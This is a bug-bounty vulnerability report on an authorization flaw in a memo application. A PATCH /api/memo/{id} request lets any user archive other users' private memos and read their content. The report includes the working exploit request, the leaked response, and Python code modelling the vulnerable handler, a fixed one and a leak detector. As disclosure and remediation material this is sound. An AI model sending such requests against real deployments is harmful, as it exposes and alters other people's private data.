
Source: huntr.dev
Reporter: kevinkien
Report ID: F0C8D778-DB86-4ED3-85BB-5315AB56915E
History: Dec 23, 2022 - 2:27 p.m.

View the content of any private memo belonging to other users

Tags: unauthorized access, private memos, api vulnerability, patch request, demo video

EPSS: 0.001 (percentile 21.8%)

Description

Any authenticated user can read the content of other users' private memos through the API. The PATCH /api/memo/{id} endpoint does not check that the memo being updated belongs to the calling user: it applies the update and returns the full memo object, including its content, to the caller. A minimal request is

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}

Proof of Concept

Log in to the website in browser 1 as user A.
Log in to the website in browser 2 as user B.
Example: user B has a private memo with id 8.

Using the session from browser 1 (user A), send the request

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}

User A then receives the response

{"data":{"id":8,"rowStatus":"ARCHIVED","creatorId":1,"createdTs":1671805207,"updatedTs":1671805219,"content":"demo content","visibility":"PRIVATE","pinned":false,"displayTs":1671805207,"creator":{"id":1,"rowStatus":"NORMAL","createdTs":1671803462,"updatedTs":1671803845,"username":"userB","role":"HOST","email":"","nickname":"userB","openId":"","userSettingList":null},"resourceList":[]}}

The content of user B's memo appears in the returned response ("content":"demo content"); "creatorId":1 and "username":"userB" confirm the memo does not belong to the caller. The response also shows "rowStatus":"ARCHIVED" with an updated updatedTs, so user A was able to modify user B's memo as well as read it.

Demo video: https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view
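To make the missing check concrete, the following Python model of the endpoint is an added example written for this page (it is not the project's own handler code): a vulnerable variant that mirrors the behaviour in the report, a hardened variant that refuses to update or return memos the caller did not create, and a small checker that flags a response exhibiting the leak. The memo record is constructed from the quoted response; the attacker's user id (2) and the in-memory store are assumptions.

```python
import copy
import json

# Constructed sample data, values taken from the response quoted in the report:
# memo 8 is PRIVATE and was created by user 1 ("userB").
MEMO_STORE = {
    8: {"id": 8, "rowStatus": "NORMAL", "creatorId": 1,
        "content": "demo content", "visibility": "PRIVATE"},
}
ATTACKER_ID = 2  # assumed id for "userA", the caller who does not own memo 8


class Forbidden(Exception):
    """Raised when the caller does not own the memo."""


class NotFound(Exception):
    """Raised when the memo id does not exist."""


def fresh_store():
    """Return an independent copy of the sample store so each run starts clean."""
    return copy.deepcopy(MEMO_STORE)


def patch_memo_vulnerable(store, current_user_id, memo_id, patch):
    """Models the behaviour described in the report: the memo is looked up by id
    only, the patch is applied, and the whole memo is returned. The caller is
    never compared with creatorId, so any user can archive and read any memo."""
    if memo_id not in store:
        raise NotFound(memo_id)
    memo = store[memo_id]
    if "rowStatus" in patch:
        memo["rowStatus"] = patch["rowStatus"]
    return {"data": dict(memo)}


def patch_memo_fixed(store, current_user_id, memo_id, patch):
    """Hardened variant: ownership is verified before the update is applied and
    before any field is serialised, so neither the side effect nor the
    content leak can happen for a memo the caller did not create."""
    if memo_id not in store:
        raise NotFound(memo_id)
    memo = store[memo_id]
    if memo["creatorId"] != current_user_id:
        raise Forbidden(f"user {current_user_id} does not own memo {memo_id}")
    if "rowStatus" in patch:
        memo["rowStatus"] = patch["rowStatus"]
    return {"data": dict(memo)}


def response_leaks_foreign_memo(response_body, current_user_id):
    """Inspect a PATCH /api/memo/{id} response body (JSON text) for the symptom
    the report describes: a memo created by a different user came back with
    its content. Error responses without a data object are not flagged."""
    data = json.loads(response_body).get("data") or {}
    return data.get("creatorId") != current_user_id and "content" in data


def reproduce(handler, attacker_id=ATTACKER_ID, memo_id=8):
    """Run the report's PoC against a handler: the attacker sends
    {"id": 8, "rowStatus": "ARCHIVED"} for a memo owned by someone else.
    Returns (content_leaked, memo_row_status_after_request)."""
    store = fresh_store()
    patch = {"id": memo_id, "rowStatus": "ARCHIVED"}
    try:
        body = json.dumps(handler(store, attacker_id, memo_id, patch))
    except Forbidden:
        body = json.dumps({"error": "forbidden"})
    return response_leaks_foreign_memo(body, attacker_id), store[memo_id]["rowStatus"]


if __name__ == "__main__":
    print("vulnerable:", reproduce(patch_memo_vulnerable))  # (True, 'ARCHIVED')
    print("fixed:     ", reproduce(patch_memo_fixed))       # (False, 'NORMAL')
```

The ownership comparison sits before the write and before the response is built; an implementation that only strips the content field after updating would still let user A archive user B's memo, which the quoted response shows also happened. The same creatorId check (or an equivalent visibility check for PUBLIC memos) belongs on every memo endpoint that takes a caller-supplied id, not only on PATCH.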
